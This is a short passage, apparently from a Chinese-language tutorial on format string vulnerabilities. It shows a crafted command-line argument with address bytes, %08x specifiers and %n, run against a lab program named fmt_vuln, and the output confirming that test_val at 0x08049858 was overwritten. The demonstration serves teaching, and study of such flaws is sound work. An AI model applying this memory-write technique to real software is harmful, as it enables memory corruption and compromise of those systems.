exit(0);
}
我在终端中调试;在本人机器上,test_val 的地址为 0x08049858。
./fmt_vuln $(printf "\x58\x98\x04\x08")%08x.%08x.%08x.%n
输出:
The right way to print user-controlled input:
X
The right way to print user-controlled input:
printf "\x58\x98\x04\x08"%08x.%08x.%08x.%x
The wrong way to print user-controlled input:
printf "\x58\x98\x04\x08"bffa27e4.00000000.bffa2960.bffa2c00
test_val @ 0x08049858 = -72 0xffffffb8